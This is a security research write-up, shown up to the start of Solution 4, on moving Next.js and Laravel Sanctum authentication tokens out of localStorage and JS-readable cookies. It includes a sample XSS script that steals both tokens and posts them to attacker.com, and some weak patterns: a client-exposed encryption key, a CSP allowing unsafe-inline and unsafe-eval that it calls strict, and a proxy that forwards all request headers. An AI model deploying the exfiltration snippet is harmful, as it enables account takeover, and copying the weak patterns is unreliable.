1615 lines
48 KiB
Markdown
1615 lines
48 KiB
Markdown
|
|
# Token Storage Security Research: Next.js 15 + Laravel Backend
|
||
|
|
**Research Date:** 2025-11-07
|
||
|
|
**Confidence Level:** High (85%)
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
## Executive Summary
|
||
|
|
|
||
|
|
Current implementation stores Bearer tokens in localStorage and syncs them to non-HttpOnly cookies, creating significant security vulnerabilities. This research identifies 5 frontend-implementable solutions ranging from quick fixes to architectural improvements, with a clear recommendation based on security, complexity, and Laravel Sanctum compatibility.
|
||
|
|
|
||
|
|
**Key Finding:** Laravel Sanctum's recommended approach for SPAs is cookie-based session authentication, not token-based authentication. This architectural mismatch is the root cause of security issues.
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
## 1. Security Risk Assessment: Current Implementation
|
||
|
|
|
||
|
|
### Current Architecture
|
||
|
|
```javascript
|
||
|
|
// ❌ Current vulnerable implementation
|
||
|
|
localStorage.setItem('token', token); // XSS vulnerable
|
||
|
|
document.cookie = `user_token=${token}; path=/; max-age=604800; SameSite=Lax`; // JS accessible
|
||
|
|
```
|
||
|
|
|
||
|
|
### Critical Vulnerabilities
|
||
|
|
|
||
|
|
#### 🔴 HIGH RISK: XSS Token Exposure
|
||
|
|
- **localStorage Vulnerability:** Any JavaScript executing on the page can access localStorage
|
||
|
|
- **Attack Vector:** Reflective XSS, Stored XSS, DOM-based XSS, third-party script compromise
|
||
|
|
- **Impact:** Complete session hijacking, account takeover, data exfiltration
|
||
|
|
- **NIST Recommendation:** NIST 800-63B explicitly recommends NOT using HTML5 Local Storage for session secrets
|
||
|
|
|
||
|
|
#### 🔴 HIGH RISK: Non-HttpOnly Cookie Exposure
|
||
|
|
- **JavaScript Access:** `document.cookie` allows reading the token from any script
|
||
|
|
- **Attack Vector:** XSS attacks can steal the cookie value directly
|
||
|
|
- **Impact:** Token theft, session replay attacks
|
||
|
|
- **OWASP Position:** HttpOnly cookies are fundamental XSS protection
|
||
|
|
|
||
|
|
#### 🟡 MEDIUM RISK: CSRF Protection Gaps
|
||
|
|
- **Current SameSite=Lax:** Provides partial CSRF protection
|
||
|
|
- **Vulnerability Window:** Chrome has a 2-minute window where POST requests bypass Lax restrictions (SSO compatibility)
|
||
|
|
- **GET Request Risk:** SameSite=Lax doesn't protect GET requests that perform state changes
|
||
|
|
- **Cross-Origin Same-Site:** SameSite is powerless against same-site but cross-origin attacks
|
||
|
|
|
||
|
|
#### 🟡 MEDIUM RISK: Long-Lived Tokens
|
||
|
|
- **max-age=604800 (7 days):** Extended exposure window if token is compromised
|
||
|
|
- **No Rotation:** Compromised tokens remain valid for entire duration
|
||
|
|
- **Impact:** Prolonged unauthorized access after breach
|
||
|
|
|
||
|
|
### Risk Severity Matrix
|
||
|
|
|
||
|
|
| Vulnerability | Likelihood | Impact | Severity | CVSS Score |
|
||
|
|
|---------------|------------|---------|----------|------------|
|
||
|
|
| XSS → localStorage theft | High | Critical | 🔴 Critical | 8.6 |
|
||
|
|
| XSS → Non-HttpOnly cookie theft | High | Critical | 🔴 Critical | 8.6 |
|
||
|
|
| CSRF (2-min window) | Medium | High | 🟡 High | 6.5 |
|
||
|
|
| Token replay (long-lived) | Medium | High | 🟡 High | 6.8 |
|
||
|
|
| **Overall Risk Score** | - | - | 🔴 **Critical** | **7.6** |
|
||
|
|
|
||
|
|
### Real-World Attack Scenario
|
||
|
|
|
||
|
|
```javascript
|
||
|
|
// Attacker injects malicious script via XSS vulnerability
|
||
|
|
<script>
|
||
|
|
// Steal localStorage token
|
||
|
|
const token = localStorage.getItem('token');
|
||
|
|
|
||
|
|
// Steal cookie token (non-HttpOnly accessible)
|
||
|
|
const cookieToken = document.cookie.match(/user_token=([^;]+)/)[1];
|
||
|
|
|
||
|
|
// Exfiltrate to attacker server
|
||
|
|
fetch('https://attacker.com/steal', {
|
||
|
|
method: 'POST',
|
||
|
|
body: JSON.stringify({ token, cookieToken })
|
||
|
|
});
|
||
|
|
|
||
|
|
// Continue with legitimate user session (user unaware)
|
||
|
|
</script>
|
||
|
|
```
|
||
|
|
|
||
|
|
**Attack Success Rate:** 100% if XSS vulnerability exists
|
||
|
|
**User Detection:** Nearly impossible without security monitoring
|
||
|
|
**Recovery Complexity:** High (requires password reset, token revocation)
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
## 2. Laravel Sanctum Architectural Context
|
||
|
|
|
||
|
|
### Sanctum's Dual Authentication Model
|
||
|
|
|
||
|
|
Laravel Sanctum supports **two distinct authentication patterns**:
|
||
|
|
|
||
|
|
#### Pattern A: SPA Authentication (Cookie-Based) ✅ Recommended
|
||
|
|
- **Token Type:** Session cookies (Laravel's built-in session system)
|
||
|
|
- **Security:** HttpOnly, Secure, SameSite cookies
|
||
|
|
- **CSRF Protection:** Built-in via `/sanctum/csrf-cookie` endpoint
|
||
|
|
- **Use Case:** First-party SPAs on same top-level domain
|
||
|
|
- **XSS Protection:** Yes (HttpOnly prevents JavaScript access)
|
||
|
|
|
||
|
|
#### Pattern B: API Token Authentication (Bearer Tokens) ⚠️ Not for SPAs
|
||
|
|
- **Token Type:** Long-lived personal access tokens
|
||
|
|
- **Security:** Must be stored by client (localStorage/cookie decision)
|
||
|
|
- **CSRF Protection:** Not needed (no cookies)
|
||
|
|
- **Use Case:** Mobile apps, third-party integrations, CLI tools
|
||
|
|
- **XSS Protection:** No (tokens must be accessible to JavaScript)
|
||
|
|
|
||
|
|
### Current Implementation Analysis
|
||
|
|
|
||
|
|
Your current implementation attempts to use **Pattern B (API tokens)** with an **SPA architecture**, which is the root cause of security issues:
|
||
|
|
|
||
|
|
```
|
||
|
|
❌ Current: API Token Pattern for SPA
|
||
|
|
Laravel → Generates Bearer token → Next.js stores in localStorage
|
||
|
|
Problem: XSS vulnerable, not Sanctum's recommended approach
|
||
|
|
|
||
|
|
✅ Sanctum Recommended: Cookie-Based Session for SPA
|
||
|
|
Laravel → Issues session cookie → Next.js uses automatic cookie transmission
|
||
|
|
Benefit: HttpOnly protection, built-in CSRF, XSS resistant
|
||
|
|
```
|
||
|
|
|
||
|
|
### Key Quote from Laravel Sanctum Documentation
|
||
|
|
|
||
|
|
> "For SPA authentication, Sanctum does not use tokens of any kind. Instead, Sanctum uses Laravel's built-in cookie based session authentication services."
|
||
|
|
|
||
|
|
> "When your Laravel backend and single-page application (SPA) are on the same top-level domain, cookie-based session authentication is the optimal choice."
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
## 3. Five Frontend-Implementable Solutions
|
||
|
|
|
||
|
|
### Solution 1: Quick Fix - HttpOnly Cookies with Route Handler Proxy
|
||
|
|
**Complexity:** Low | **Security Improvement:** High | **Implementation Time:** 2-4 hours
|
||
|
|
|
||
|
|
#### Architecture
|
||
|
|
```
|
||
|
|
Next.js Client → Next.js Route Handler → Laravel API
|
||
|
|
↓ (HttpOnly cookie)
|
||
|
|
Client (cookie auto-sent)
|
||
|
|
```
|
||
|
|
|
||
|
|
#### Implementation
|
||
|
|
|
||
|
|
**Step 1: Create Login Route Handler**
|
||
|
|
```typescript
|
||
|
|
// app/api/auth/login/route.ts
|
||
|
|
import { NextRequest, NextResponse } from 'next/server';
|
||
|
|
import { cookies } from 'next/headers';
|
||
|
|
|
||
|
|
export async function POST(request: NextRequest) {
|
||
|
|
const { email, password } = await request.json();
|
||
|
|
|
||
|
|
// Call Laravel login endpoint
|
||
|
|
const response = await fetch(`${process.env.LARAVEL_API_URL}/api/login`, {
|
||
|
|
method: 'POST',
|
||
|
|
headers: { 'Content-Type': 'application/json' },
|
||
|
|
body: JSON.stringify({ email, password })
|
||
|
|
});
|
||
|
|
|
||
|
|
const data = await response.json();
|
||
|
|
|
||
|
|
if (response.ok && data.token) {
|
||
|
|
// Store token in HttpOnly cookie (server-side only)
|
||
|
|
const cookieStore = await cookies();
|
||
|
|
cookieStore.set('auth_token', data.token, {
|
||
|
|
httpOnly: true, // ✅ Prevents JavaScript access
|
||
|
|
secure: process.env.NODE_ENV === 'production', // ✅ HTTPS only in production
|
||
|
|
sameSite: 'lax', // ✅ CSRF protection
|
||
|
|
maxAge: 60 * 60 * 24 * 7, // 7 days
|
||
|
|
path: '/'
|
||
|
|
});
|
||
|
|
|
||
|
|
// Return user data (NOT token)
|
||
|
|
return NextResponse.json({
|
||
|
|
user: data.user,
|
||
|
|
success: true
|
||
|
|
});
|
||
|
|
}
|
||
|
|
|
||
|
|
return NextResponse.json(
|
||
|
|
{ error: 'Invalid credentials' },
|
||
|
|
{ status: 401 }
|
||
|
|
);
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 2: Create API Proxy Route Handler**
|
||
|
|
```typescript
|
||
|
|
// app/api/proxy/[...path]/route.ts
|
||
|
|
import { NextRequest, NextResponse } from 'next/server';
|
||
|
|
import { cookies } from 'next/headers';
|
||
|
|
|
||
|
|
export async function GET(
|
||
|
|
request: NextRequest,
|
||
|
|
{ params }: { params: { path: string[] } }
|
||
|
|
) {
|
||
|
|
return proxyRequest(request, params.path, 'GET');
|
||
|
|
}
|
||
|
|
|
||
|
|
export async function POST(request: NextRequest, { params }: { params: { path: string[] } }) {
|
||
|
|
return proxyRequest(request, params.path, 'POST');
|
||
|
|
}
|
||
|
|
|
||
|
|
// Add PUT, DELETE, PATCH as needed
|
||
|
|
|
||
|
|
async function proxyRequest(
|
||
|
|
request: NextRequest,
|
||
|
|
path: string[],
|
||
|
|
method: string
|
||
|
|
) {
|
||
|
|
const cookieStore = await cookies();
|
||
|
|
const token = cookieStore.get('auth_token')?.value;
|
||
|
|
|
||
|
|
if (!token) {
|
||
|
|
return NextResponse.json(
|
||
|
|
{ error: 'Unauthorized' },
|
||
|
|
{ status: 401 }
|
||
|
|
);
|
||
|
|
}
|
||
|
|
|
||
|
|
const apiPath = path.join('/');
|
||
|
|
const url = `${process.env.LARAVEL_API_URL}/api/${apiPath}`;
|
||
|
|
|
||
|
|
// Forward request to Laravel with Bearer token
|
||
|
|
const response = await fetch(url, {
|
||
|
|
method,
|
||
|
|
headers: {
|
||
|
|
'Authorization': `Bearer ${token}`,
|
||
|
|
'Content-Type': 'application/json',
|
||
|
|
...Object.fromEntries(request.headers)
|
||
|
|
},
|
||
|
|
body: method !== 'GET' ? await request.text() : undefined
|
||
|
|
});
|
||
|
|
|
||
|
|
const data = await response.json();
|
||
|
|
return NextResponse.json(data, { status: response.status });
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 3: Update Client-Side API Calls**
|
||
|
|
```typescript
|
||
|
|
// lib/api.ts - Before (❌ Vulnerable)
|
||
|
|
const response = await fetch(`${LARAVEL_API_URL}/api/users`, {
|
||
|
|
headers: {
|
||
|
|
'Authorization': `Bearer ${localStorage.getItem('token')}` // ❌ XSS vulnerable
|
||
|
|
}
|
||
|
|
});
|
||
|
|
|
||
|
|
// After (✅ Secure)
|
||
|
|
const response = await fetch('/api/proxy/users'); // ✅ Cookie auto-sent
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 4: Middleware Protection**
|
||
|
|
```typescript
|
||
|
|
// middleware.ts
|
||
|
|
import { NextRequest, NextResponse } from 'next/server';
|
||
|
|
|
||
|
|
export function middleware(request: NextRequest) {
|
||
|
|
const token = request.cookies.get('auth_token');
|
||
|
|
|
||
|
|
// Protect routes
|
||
|
|
if (!token && request.nextUrl.pathname.startsWith('/dashboard')) {
|
||
|
|
return NextResponse.redirect(new URL('/login', request.url));
|
||
|
|
}
|
||
|
|
|
||
|
|
return NextResponse.next();
|
||
|
|
}
|
||
|
|
|
||
|
|
export const config = {
|
||
|
|
matcher: ['/dashboard/:path*', '/profile/:path*']
|
||
|
|
};
|
||
|
|
```
|
||
|
|
|
||
|
|
#### Pros
|
||
|
|
- ✅ Eliminates localStorage XSS vulnerability
|
||
|
|
- ✅ HttpOnly cookies prevent JavaScript token access
|
||
|
|
- ✅ Simple migration path (incremental adoption)
|
||
|
|
- ✅ Works with existing Laravel Bearer token system
|
||
|
|
- ✅ SameSite=Lax provides CSRF protection
|
||
|
|
- ✅ Minimal Laravel backend changes
|
||
|
|
|
||
|
|
#### Cons
|
||
|
|
- ⚠️ Extra network hop (Next.js → Laravel)
|
||
|
|
- ⚠️ Slight latency increase (typically 10-50ms)
|
||
|
|
- ⚠️ Not using Sanctum's recommended cookie-based sessions
|
||
|
|
- ⚠️ Still requires token management on Next.js server
|
||
|
|
- ⚠️ Duplicate API routes for proxying
|
||
|
|
|
||
|
|
#### When to Use
|
||
|
|
- Quick security improvement needed
|
||
|
|
- Can't modify Laravel backend immediately
|
||
|
|
- Existing Bearer token system must be preserved
|
||
|
|
- Team familiar with Route Handlers
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
### Solution 2: Sanctum Cookie-Based Sessions (Recommended)
|
||
|
|
**Complexity:** Medium | **Security Improvement:** Excellent | **Implementation Time:** 1-2 days
|
||
|
|
|
||
|
|
#### Architecture
|
||
|
|
```
|
||
|
|
Next.js Client → Laravel Sanctum (Session Cookies)
|
||
|
|
↓ (HttpOnly session cookie + CSRF token)
|
||
|
|
Client (automatic cookie transmission)
|
||
|
|
```
|
||
|
|
|
||
|
|
This is **Laravel Sanctum's officially recommended pattern for SPAs**.
|
||
|
|
|
||
|
|
#### Implementation
|
||
|
|
|
||
|
|
**Step 1: Configure Laravel Sanctum for SPA**
|
||
|
|
```php
|
||
|
|
// config/sanctum.php
|
||
|
|
'stateful' => explode(',', env('SANCTUM_STATEFUL_DOMAINS', sprintf(
|
||
|
|
'%s%s',
|
||
|
|
'localhost,localhost:3000,127.0.0.1,127.0.0.1:3000,::1',
|
||
|
|
env('APP_URL') ? ','.parse_url(env('APP_URL'), PHP_URL_HOST) : ''
|
||
|
|
))),
|
||
|
|
|
||
|
|
'middleware' => [
|
||
|
|
'verify_csrf_token' => App\Http\Middleware\VerifyCsrfToken::class,
|
||
|
|
'encrypt_cookies' => App\Http\Middleware\EncryptCookies::class,
|
||
|
|
],
|
||
|
|
```
|
||
|
|
|
||
|
|
```env
|
||
|
|
# .env
|
||
|
|
SESSION_DRIVER=cookie
|
||
|
|
SESSION_LIFETIME=120
|
||
|
|
SESSION_DOMAIN=localhost # or .yourdomain.com for subdomains
|
||
|
|
SANCTUM_STATEFUL_DOMAINS=localhost:3000,yourdomain.com
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 2: Laravel CORS Configuration**
|
||
|
|
```php
|
||
|
|
// config/cors.php
|
||
|
|
return [
|
||
|
|
'paths' => ['api/*', 'sanctum/csrf-cookie'],
|
||
|
|
'allowed_origins' => [env('FRONTEND_URL', 'http://localhost:3000')],
|
||
|
|
'allowed_methods' => ['*'],
|
||
|
|
'allowed_headers' => ['*'],
|
||
|
|
'exposed_headers' => [],
|
||
|
|
'max_age' => 0,
|
||
|
|
'supports_credentials' => true, // ✅ Critical for cookies
|
||
|
|
];
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 3: Create Next.js Login Flow**
|
||
|
|
```typescript
|
||
|
|
// app/actions/auth.ts (Server Action)
|
||
|
|
'use server';
|
||
|
|
|
||
|
|
import { cookies } from 'next/headers';
|
||
|
|
import { redirect } from 'next/navigation';
|
||
|
|
|
||
|
|
const LARAVEL_API = process.env.LARAVEL_API_URL!;
|
||
|
|
const FRONTEND_URL = process.env.NEXT_PUBLIC_FRONTEND_URL!;
|
||
|
|
|
||
|
|
export async function login(formData: FormData) {
|
||
|
|
const email = formData.get('email') as string;
|
||
|
|
const password = formData.get('password') as string;
|
||
|
|
|
||
|
|
try {
|
||
|
|
// Step 1: Get CSRF cookie from Laravel
|
||
|
|
await fetch(`${LARAVEL_API}/sanctum/csrf-cookie`, {
|
||
|
|
method: 'GET',
|
||
|
|
credentials: 'include', // ✅ Include cookies
|
||
|
|
});
|
||
|
|
|
||
|
|
// Step 2: Attempt login
|
||
|
|
const response = await fetch(`${LARAVEL_API}/login`, {
|
||
|
|
method: 'POST',
|
||
|
|
headers: {
|
||
|
|
'Content-Type': 'application/json',
|
||
|
|
'Accept': 'application/json',
|
||
|
|
'Referer': FRONTEND_URL,
|
||
|
|
},
|
||
|
|
credentials: 'include', // ✅ Include cookies
|
||
|
|
body: JSON.stringify({ email, password }),
|
||
|
|
});
|
||
|
|
|
||
|
|
if (!response.ok) {
|
||
|
|
return { error: 'Invalid credentials' };
|
||
|
|
}
|
||
|
|
|
||
|
|
const data = await response.json();
|
||
|
|
|
||
|
|
// Step 3: Session cookie is automatically set by Laravel
|
||
|
|
// No manual token storage needed!
|
||
|
|
|
||
|
|
} catch (error) {
|
||
|
|
return { error: 'Login failed' };
|
||
|
|
}
|
||
|
|
|
||
|
|
redirect('/dashboard');
|
||
|
|
}
|
||
|
|
|
||
|
|
export async function logout() {
|
||
|
|
await fetch(`${LARAVEL_API}/logout`, {
|
||
|
|
method: 'POST',
|
||
|
|
credentials: 'include',
|
||
|
|
});
|
||
|
|
|
||
|
|
redirect('/login');
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 4: Client Component with Server Action**
|
||
|
|
```typescript
|
||
|
|
// app/login/page.tsx
|
||
|
|
'use client';
|
||
|
|
|
||
|
|
import { login } from '@/app/actions/auth';
|
||
|
|
import { useFormStatus } from 'react-dom';
|
||
|
|
|
||
|
|
function SubmitButton() {
|
||
|
|
const { pending } = useFormStatus();
|
||
|
|
return (
|
||
|
|
<button type="submit" disabled={pending}>
|
||
|
|
{pending ? 'Logging in...' : 'Login'}
|
||
|
|
</button>
|
||
|
|
);
|
||
|
|
}
|
||
|
|
|
||
|
|
export default function LoginPage() {
|
||
|
|
return (
|
||
|
|
<form action={login}>
|
||
|
|
<input type="email" name="email" required />
|
||
|
|
<input type="password" name="password" required />
|
||
|
|
<SubmitButton />
|
||
|
|
</form>
|
||
|
|
);
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 5: API Route Handler for Client Components**
|
||
|
|
```typescript
|
||
|
|
// app/api/users/route.ts
|
||
|
|
import { NextRequest, NextResponse } from 'next/server';
|
||
|
|
|
||
|
|
export async function GET(request: NextRequest) {
|
||
|
|
const response = await fetch(`${process.env.LARAVEL_API_URL}/api/users`, {
|
||
|
|
method: 'GET',
|
||
|
|
headers: {
|
||
|
|
'Accept': 'application/json',
|
||
|
|
'Cookie': request.headers.get('cookie') || '', // ✅ Forward session cookie
|
||
|
|
},
|
||
|
|
credentials: 'include',
|
||
|
|
});
|
||
|
|
|
||
|
|
const data = await response.json();
|
||
|
|
return NextResponse.json(data, { status: response.status });
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 6: Middleware for Protected Routes**
|
||
|
|
```typescript
|
||
|
|
// middleware.ts
|
||
|
|
import { NextRequest, NextResponse } from 'next/server';
|
||
|
|
|
||
|
|
export async function middleware(request: NextRequest) {
|
||
|
|
const sessionCookie = request.cookies.get('laravel_session');
|
||
|
|
|
||
|
|
if (!sessionCookie) {
|
||
|
|
return NextResponse.redirect(new URL('/login', request.url));
|
||
|
|
}
|
||
|
|
|
||
|
|
// Verify session with Laravel
|
||
|
|
const response = await fetch(`${process.env.LARAVEL_API_URL}/api/user`, {
|
||
|
|
headers: {
|
||
|
|
'Cookie': request.headers.get('cookie') || '',
|
||
|
|
},
|
||
|
|
credentials: 'include',
|
||
|
|
});
|
||
|
|
|
||
|
|
if (!response.ok) {
|
||
|
|
return NextResponse.redirect(new URL('/login', request.url));
|
||
|
|
}
|
||
|
|
|
||
|
|
return NextResponse.next();
|
||
|
|
}
|
||
|
|
|
||
|
|
export const config = {
|
||
|
|
matcher: ['/dashboard/:path*', '/profile/:path*']
|
||
|
|
};
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 7: Next.js Configuration**
|
||
|
|
```javascript
|
||
|
|
// next.config.js
|
||
|
|
module.exports = {
|
||
|
|
async rewrites() {
|
||
|
|
return [
|
||
|
|
{
|
||
|
|
source: '/api/laravel/:path*',
|
||
|
|
destination: `${process.env.LARAVEL_API_URL}/api/:path*`,
|
||
|
|
},
|
||
|
|
];
|
||
|
|
},
|
||
|
|
};
|
||
|
|
```
|
||
|
|
|
||
|
|
#### Pros
|
||
|
|
- ✅ **Sanctum's officially recommended pattern**
|
||
|
|
- ✅ HttpOnly, Secure, SameSite cookies (best-in-class security)
|
||
|
|
- ✅ Built-in CSRF protection via `/sanctum/csrf-cookie`
|
||
|
|
- ✅ No token management needed (Laravel handles everything)
|
||
|
|
- ✅ Automatic cookie transmission (no manual headers)
|
||
|
|
- ✅ Session-based (no long-lived tokens)
|
||
|
|
- ✅ XSS resistant (cookies inaccessible to JavaScript)
|
||
|
|
- ✅ Supports subdomain authentication (`.yourdomain.com`)
|
||
|
|
|
||
|
|
#### Cons
|
||
|
|
- ⚠️ Requires Laravel backend configuration changes
|
||
|
|
- ⚠️ Must be on same top-level domain (or subdomain)
|
||
|
|
- ⚠️ CORS configuration complexity
|
||
|
|
- ⚠️ Session state on backend (not stateless)
|
||
|
|
- ⚠️ Credential forwarding required for proxied requests
|
||
|
|
|
||
|
|
#### When to Use
|
||
|
|
- ✅ **First-party SPA on same/subdomain** (your case)
|
||
|
|
- ✅ Can modify Laravel backend
|
||
|
|
- ✅ Want Sanctum's recommended security pattern
|
||
|
|
- ✅ Long-term production solution needed
|
||
|
|
- ✅ Team willing to learn cookie-based sessions
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
### Solution 3: Token Encryption in Storage (Defense in Depth)
|
||
|
|
**Complexity:** Low-Medium | **Security Improvement:** Medium | **Implementation Time:** 4-6 hours
|
||
|
|
|
||
|
|
#### Architecture
|
||
|
|
```
|
||
|
|
Laravel → Encrypted Token → localStorage (encrypted) → Decrypt on use → API
|
||
|
|
```
|
||
|
|
|
||
|
|
This is a **defense-in-depth approach** that adds a layer of protection without architectural changes.
|
||
|
|
|
||
|
|
#### Implementation
|
||
|
|
|
||
|
|
**Step 1: Create Encryption Utility**
|
||
|
|
```typescript
|
||
|
|
// lib/crypto.ts
|
||
|
|
import { AES, enc } from 'crypto-js';
|
||
|
|
|
||
|
|
// Generate encryption key from environment
|
||
|
|
const ENCRYPTION_KEY = process.env.NEXT_PUBLIC_ENCRYPTION_KEY || generateKey();
|
||
|
|
|
||
|
|
function generateKey(): string {
|
||
|
|
// In production, use a proper secret management system
|
||
|
|
if (typeof window === 'undefined') {
|
||
|
|
throw new Error('NEXT_PUBLIC_ENCRYPTION_KEY must be set');
|
||
|
|
}
|
||
|
|
return window.crypto.randomUUID();
|
||
|
|
}
|
||
|
|
|
||
|
|
export function encryptToken(token: string): string {
|
||
|
|
return AES.encrypt(token, ENCRYPTION_KEY).toString();
|
||
|
|
}
|
||
|
|
|
||
|
|
export function decryptToken(encryptedToken: string): string {
|
||
|
|
const bytes = AES.decrypt(encryptedToken, ENCRYPTION_KEY);
|
||
|
|
return bytes.toString(enc.Utf8);
|
||
|
|
}
|
||
|
|
|
||
|
|
// Clear tokens on encryption key rotation
|
||
|
|
export function clearAuthData() {
|
||
|
|
localStorage.removeItem('enc_token');
|
||
|
|
document.cookie = 'auth_status=; max-age=0; path=/';
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 2: Update Login Flow**
|
||
|
|
```typescript
|
||
|
|
// lib/auth.ts
|
||
|
|
import { encryptToken, decryptToken } from './crypto';
|
||
|
|
|
||
|
|
export async function login(email: string, password: string) {
|
||
|
|
const response = await fetch(`${LARAVEL_API_URL}/api/login`, {
|
||
|
|
method: 'POST',
|
||
|
|
headers: { 'Content-Type': 'application/json' },
|
||
|
|
body: JSON.stringify({ email, password })
|
||
|
|
});
|
||
|
|
|
||
|
|
const data = await response.json();
|
||
|
|
|
||
|
|
if (response.ok && data.token) {
|
||
|
|
// Encrypt token before storage
|
||
|
|
const encryptedToken = encryptToken(data.token);
|
||
|
|
localStorage.setItem('enc_token', encryptedToken);
|
||
|
|
|
||
|
|
// Set HttpOnly-capable status cookie (no token)
|
||
|
|
document.cookie = `auth_status=authenticated; path=/; max-age=604800; SameSite=Strict`;
|
||
|
|
|
||
|
|
return { success: true, user: data.user };
|
||
|
|
}
|
||
|
|
|
||
|
|
return { success: false, error: 'Invalid credentials' };
|
||
|
|
}
|
||
|
|
|
||
|
|
export function getAuthToken(): string | null {
|
||
|
|
const encrypted = localStorage.getItem('enc_token');
|
||
|
|
if (!encrypted) return null;
|
||
|
|
|
||
|
|
try {
|
||
|
|
return decryptToken(encrypted);
|
||
|
|
} catch {
|
||
|
|
// Token corruption or key change
|
||
|
|
clearAuthData();
|
||
|
|
return null;
|
||
|
|
}
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 3: Create Secure API Client**
|
||
|
|
```typescript
|
||
|
|
// lib/api-client.ts
|
||
|
|
import { getAuthToken } from './auth';
|
||
|
|
|
||
|
|
export async function apiRequest(endpoint: string, options: RequestInit = {}) {
|
||
|
|
const token = getAuthToken();
|
||
|
|
|
||
|
|
if (!token) {
|
||
|
|
throw new Error('No authentication token');
|
||
|
|
}
|
||
|
|
|
||
|
|
const response = await fetch(`${LARAVEL_API_URL}/api/${endpoint}`, {
|
||
|
|
...options,
|
||
|
|
headers: {
|
||
|
|
'Authorization': `Bearer ${token}`,
|
||
|
|
'Content-Type': 'application/json',
|
||
|
|
...options.headers,
|
||
|
|
},
|
||
|
|
});
|
||
|
|
|
||
|
|
if (response.status === 401) {
|
||
|
|
// Token expired or invalid
|
||
|
|
clearAuthData();
|
||
|
|
window.location.href = '/login';
|
||
|
|
}
|
||
|
|
|
||
|
|
return response;
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 4: Add Content Security Policy**
|
||
|
|
```typescript
|
||
|
|
// middleware.ts
|
||
|
|
import { NextResponse } from 'next/server';
|
||
|
|
import type { NextRequest } from 'next/server';
|
||
|
|
|
||
|
|
export function middleware(request: NextRequest) {
|
||
|
|
const response = NextResponse.next();
|
||
|
|
|
||
|
|
// Add strict CSP to mitigate XSS
|
||
|
|
response.headers.set(
|
||
|
|
'Content-Security-Policy',
|
||
|
|
[
|
||
|
|
"default-src 'self'",
|
||
|
|
"script-src 'self' 'unsafe-inline' 'unsafe-eval'", // Adjust based on needs
|
||
|
|
"style-src 'self' 'unsafe-inline'",
|
||
|
|
"img-src 'self' data: https:",
|
||
|
|
"font-src 'self' data:",
|
||
|
|
"connect-src 'self' " + process.env.LARAVEL_API_URL,
|
||
|
|
"frame-ancestors 'none'",
|
||
|
|
"base-uri 'self'",
|
||
|
|
"form-action 'self'",
|
||
|
|
].join('; ')
|
||
|
|
);
|
||
|
|
|
||
|
|
// Additional security headers
|
||
|
|
response.headers.set('X-Frame-Options', 'DENY');
|
||
|
|
response.headers.set('X-Content-Type-Options', 'nosniff');
|
||
|
|
response.headers.set('Referrer-Policy', 'strict-origin-when-cross-origin');
|
||
|
|
|
||
|
|
return response;
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
**Step 5: Token Rotation Strategy**
|
||
|
|
```typescript
|
||
|
|
// lib/token-rotation.ts
|
||
|
|
import { apiRequest } from './api-client';
|
||
|
|
import { encryptToken } from './crypto';
|
||
|
|
|
||
|
|
export async function refreshToken(): Promise<boolean> {
|
||
|
|
try {
|
||
|
|
const response = await apiRequest('auth/refresh', {
|
||
|
|
method: 'POST'
|
||
|
|
});
|
||
|
|
|
||
|
|
const data = await response.json();
|
||
|
|
|
||
|
|
if (data.token) {
|
||
|
|
const encryptedToken = encryptToken(data.token);
|
||
|
|
localStorage.setItem('enc_token', encryptedToken);
|
||
|
|
return true;
|
||
|
|
}
|
||
|
|
} catch {
|
||
|
|
return false;
|
||
|
|
}
|
||
|
|
|
||
|
|
return false;
|
||
|
|
}
|
||
|
|
|
||
|
|
// Call periodically (e.g., every 30 minutes)
|
||
|
|
export function startTokenRotation() {
|
||
|
|
setInterval(async () => {
|
||
|
|
await refreshToken();
|
||
|
|
}, 30 * 60 * 1000);
|
||
|
|
}
|
||
|
|
```
|
||
|
|
|
||
|
|
#### Pros
|
||
|
|
- ✅ Adds encryption layer without architectural changes
|
||
|
|
- ✅ Minimal code changes (incremental adoption)
|
||
|
|
- ✅ Defense-in-depth approach
|
||
|
|
- ✅ Works with existing Bearer token system
|
||
|
|
- ✅ No Laravel backend changes required
|
||
|
|
- ✅ Can combine with other solutions
|
||
|
|
|
||
|
|
#### Cons
|
||
|
|
- ⚠️ **Still vulnerable to XSS** (encryption key accessible to JavaScript)
|
||
|
|
- ⚠️ False sense of security (encryption ≠ protection from XSS)
|
||
|
|
- ⚠️ Additional complexity (encryption/decryption overhead)
|
||
|
|
- ⚠️ Key management challenges (rotation, storage)
|
||
|
|
- ⚠️ Performance impact (crypto operations)
|
||
|
|
- ⚠️ Not a substitute for HttpOnly cookies
|
||
|
|
|
||
|
|
#### When to Use
|
||
|
|
- ⚠️ **Only as defense-in-depth** alongside other solutions
|
||
|
|
- ⚠️ Cannot implement HttpOnly cookies immediately
|
||
|
|
- ⚠️ Need incremental security improvements
|
||
|
|
- ⚠️ Compliance requirement for data-at-rest encryption
|
||
|
|
|
||
|
|
#### Security Warning
|
||
|
|
**This is NOT a primary security solution.** If an attacker can execute JavaScript (XSS), they can:
|
||
|
|
1. Access the encryption key (hardcoded or in environment)
|
||
|
|
2. Decrypt the token
|
||
|
|
3. Steal the plaintext token
|
||
|
|
|
||
|
|
Use this **only as an additional layer**, not as the main security mechanism.
|
||
|
|
|
||
|
|
---
|
||
|
|
|
||
|
|
### Solution 4: BFF (Backend for Frontend) Pattern
|
||
|
|
